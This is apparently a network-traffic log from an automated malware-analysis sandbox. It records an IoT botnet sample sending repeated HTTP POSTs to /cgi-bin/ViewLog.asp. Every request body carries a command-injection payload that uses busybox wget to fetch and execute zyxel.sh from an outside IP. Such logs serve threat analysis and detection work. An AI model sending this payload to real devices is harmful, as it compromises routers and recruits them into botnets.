                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:20:40.778275967 CET19985INHTTP/1.1 404
                                                              Content-Type: text/html;charset=utf-8
                                                              Content-Language: en
                                                              Content-Length: 431
                                                              Date: Mon, 13 Nov 2023 21:20:39 GMT
                                                              Keep-Alive: timeout=5
                                                              Connection: keep-alive
                                                              Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 48 54 54 50 20 53 74 61 74 75 73 20 34 30 34 20 e2 80 93 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 62 6f 64 79 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 7d 20 68 31 2c 20 68 32 2c 20 68 33 2c 20 62 20 7b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 7d 20 68 31 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 32 70 78 3b 7d 20 68 32 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 36 70 78 3b 7d 20 68 33 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 7d 20 70 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 7d 20 61 20 7b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 7d 20 2e 6c 69 6e 65 20 7b 68 65 69 67 68 74 3a 31 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 62 6f 72 64 65 72 3a 6e 6f 6e 65 3b 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 68 31 3e 48 54 54 50 20 53 74 61 74 75 73 20 34 30 34 20 e2 80 93 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                              Data Ascii: <!doctype html><html lang="en"><head><title>HTTP Status 404 Not Found</title><style type="text/css">body {font-family:Tahoma,Arial,sans-serif;} h1, h2, h3, b {color:white;background-color:#525D76;} h1 {font-size:22px;} h2 {font-size:16px;} h3 {font-size:14px;} p {font-size:12px;} a {color:black;} .line {height:1px;background-color:#525D76;border:none;}</style></head><body><h1>HTTP Status 404 Not Found</h1></body></html>


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              1022192.168.2.233301431.136.135.68080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:20:40.456463099 CET19883OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:20:41.440324068 CET20007OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:20:43.424022913 CET20234OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:20:47.423569918 CET20631OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:20:55.358521938 CET20686OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:21:11.228467941 CET20707OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              1023192.168.2.235031231.136.85.1908080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:20:40.457017899 CET19883OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:20:41.472326994 CET20007OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:20:43.456000090 CET20235OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:20:47.423552036 CET20630OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:20:55.358540058 CET20686OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:21:11.228454113 CET20707OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              1024192.168.2.233716694.120.211.778080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:20:40.481192112 CET19888OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              1025192.168.2.234142294.120.63.1778080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:20:40.483542919 CET19889OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              1026192.168.2.235880894.187.235.708080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:20:40.864631891 CET19987OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              1027192.168.2.233696862.97.97.2108080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:20:41.566816092 CET20010OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:20:41.879620075 CET20054INHTTP/1.1 404 Not Found
                                                              Date: Tue, 31 Oct 2023 03:04:52 GMT
                                                              Server: DNVRS-Webs
                                                              Cache-Control: no-cache
                                                              Content-Length: 166
                                                              Content-Type: text/html
                                                              Connection: keep-alive
                                                              Keep-Alive: timeout=60, max=99
                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 44 6f 63 75 6d 65 6e 74 20 45 72 72 6f 72 3a 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 3c 68 32 3e 41 63 63 65 73 73 20 45 72 72 6f 72 3a 20 34 30 34 20 2d 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 70 3e 43 61 6e 27 74 20 6f 70 65 6e 20 55 52 4c 3c 2f 70 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                              Data Ascii: <!DOCTYPE html><html><head><title>Document Error: Not Found</title></head><body><h2>Access Error: 404 -- Not Found</h2><p>Can't open URL</p></body></html>


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              1028192.168.2.235709231.136.128.868080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:20:41.585328102 CET20010OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:20:42.592165947 CET20128OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:20:44.575846910 CET20348OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:20:48.703495026 CET20667OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:20:56.638324022 CET20690OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:21:12.508198977 CET20708OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              1029192.168.2.233340494.121.103.218080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:20:41.595884085 CET20011OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              103192.168.2.235868094.23.45.398080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:18:24.395476103 CET3068OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:18:24.690795898 CET3083INHTTP/1.1 302 Moved Temporarily
                                                              Server: nginx
                                                              Date: Mon, 13 Nov 2023 21:18:24 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 154
                                                              Connection: close
                                                              Location: https://192.168.0.14:8080/cgi-bin/ViewLog.asp
                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                              Data Ascii: <html><head><title>302 Found</title></head><body bgcolor="white"><center><h1>302 Found</h1></center><hr><center>nginx</center></body></html>


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              1030192.168.2.234172462.2.148.1678080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:20:41.604345083 CET20011OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:20:41.964520931 CET20110INHTTP/1.1 400 Bad Request
                                                              Date: Mon, 13 Nov 2023 21:20:37 GMT
                                                              Server:
                                                              X-Frame-Options: SAMEORIGIN
                                                              Content-Security-Policy: script-src 'self' 'unsafe-inline' 'unsafe-eval' ; object-src 'self' ; worker-src 'self' blob:
                                                              Content-Length: 226
                                                              Connection: close
                                                              Content-Type: text/html; charset=iso-8859-1
